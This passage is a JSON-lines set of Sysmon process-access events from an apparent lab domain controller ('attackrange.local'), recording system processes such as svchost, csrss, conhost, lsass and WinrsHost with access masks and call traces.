{"EventTime":"2020-08-01 07:58:55","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4520,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:55.689\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:55.689","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:55","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4521,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:55.689\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:55.689","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:55","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4522,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:55.689\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:55.689","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:55","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4523,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:55.689\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:55.689","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:55","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4524,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:55.689\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1148\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-20BF-5F25-0000-001074C30600}\r\nTargetProcessId: 5076\r\nTargetImage: C:\\Windows\\system32\\conhost.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\SYSTEM32\\CSRSRV.dll+1a30|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5c09|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:55.689","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"1148","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-20BF-5F25-0000-001074C30600}","TargetProcessId":"5076","TargetImage":"C:\\Windows\\system32\\conhost.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\SYSTEM32\\CSRSRV.dll+1a30|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5c09|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:58:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:55","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4525,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:55.705\r\nSourceProcessGUID: {41C8662E-20BF-5F25-0000-001074C30600}\r\nSourceProcessId: 5076\r\nSourceThreadId: 4416\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {41C8662E-20BF-5F25-0000-0010F4C20600}\r\nTargetProcessId: 3472\r\nTargetImage: C:\\Windows\\system32\\WinrsHost.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:55.705","SourceProcessGUID":"{41C8662E-20BF-5F25-0000-001074C30600}","SourceProcessId":"5076","SourceThreadId":"4416","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{41C8662E-20BF-5F25-0000-0010F4C20600}","TargetProcessId":"3472","TargetImage":"C:\\Windows\\system32\\WinrsHost.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:55","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4526,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:55.705\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-20BF-5F25-0000-0010F4C20600}\r\nTargetProcessId: 3472\r\nTargetImage: C:\\Windows\\system32\\WinrsHost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:55.705","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-20BF-5F25-0000-0010F4C20600}","TargetProcessId":"3472","TargetImage":"C:\\Windows\\system32\\WinrsHost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:55","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4527,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:55.720\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010B1CD0000}\r\nSourceProcessId: 1312\r\nSourceThreadId: 1548\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-20BF-5F25-0000-0010F4C20600}\r\nTargetProcessId: 3472\r\nTargetImage: C:\\Windows\\system32\\WinrsHost.exe\r\nGrantedAccess: 0x40\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\winrscmd.dll+8d36|C:\\Windows\\system32\\winrscmd.dll+92d5|C:\\Windows\\system32\\winrscmd.dll+af31|C:\\Windows\\system32\\winrscmd.dll+23dc|c:\\windows\\system32\\wsmsvc.dll+155ac7|c:\\windows\\system32\\wsmsvc.dll+13f76d|c:\\windows\\system32\\wsmsvc.dll+13f3cf|c:\\windows\\system32\\wsmsvc.dll+13fcb2|c:\\windows\\system32\\wsmsvc.dll+9ab10|c:\\windows\\system32\\wsmsvc.dll+9b611|c:\\windows\\system32\\wsmsvc.dll+4495|c:\\windows\\system32\\wsmsvc.dll+16816c|c:\\windows\\system32\\wsmsvc.dll+1689b8|c:\\windows\\system32\\wsmsvc.dll+16345b|c:\\windows\\system32\\wsmsvc.dll+163125|c:\\windows\\system32\\wsmsvc.dll+14ce9c|c:\\windows\\system32\\wsmsvc.dll+130049|c:\\windows\\system32\\wsmsvc.dll+13571a|c:\\windows\\system32\\wsmsvc.dll+12f47e|c:\\windows\\system32\\wsmsvc.dll+125587|c:\\windows\\system32\\wsmsvc.dll+11f562|c:\\windows\\system32\\wsmsvc.dll+124574","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:55.720","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010B1CD0000}","SourceProcessId":"1312","SourceThreadId":"1548","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-20BF-5F25-0000-0010F4C20600}","TargetProcessId":"3472","TargetImage":"C:\\Windows\\system32\\WinrsHost.exe","GrantedAccess":"0x40","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\winrscmd.dll+8d36|C:\\Windows\\system32\\winrscmd.dll+92d5|C:\\Windows\\system32\\winrscmd.dll+af31|C:\\Windows\\system32\\winrscmd.dll+23dc|c:\\windows\\system32\\wsmsvc.dll+155ac7|c:\\windows\\system32\\wsmsvc.dll+13f76d|c:\\windows\\system32\\wsmsvc.dll+13f3cf|c:\\windows\\system32\\wsmsvc.dll+13fcb2|c:\\windows\\system32\\wsmsvc.dll+9ab10|c:\\windows\\system32\\wsmsvc.dll+9b611|c:\\windows\\system32\\wsmsvc.dll+4495|c:\\windows\\system32\\wsmsvc.dll+16816c|c:\\windows\\system32\\wsmsvc.dll+1689b8|c:\\windows\\system32\\wsmsvc.dll+16345b|c:\\windows\\system32\\wsmsvc.dll+163125|c:\\windows\\system32\\wsmsvc.dll+14ce9c|c:\\windows\\system32\\wsmsvc.dll+130049|c:\\windows\\system32\\wsmsvc.dll+13571a|c:\\windows\\system32\\wsmsvc.dll+12f47e|c:\\windows\\system32\\wsmsvc.dll+125587|c:\\windows\\system32\\wsmsvc.dll+11f562|c:\\windows\\system32\\wsmsvc.dll+124574","EventReceivedTime":"2020-08-01 07:58:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:55","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4528,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:55.720\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 904\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-0010B1CD0000}\r\nTargetProcessId: 1312\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 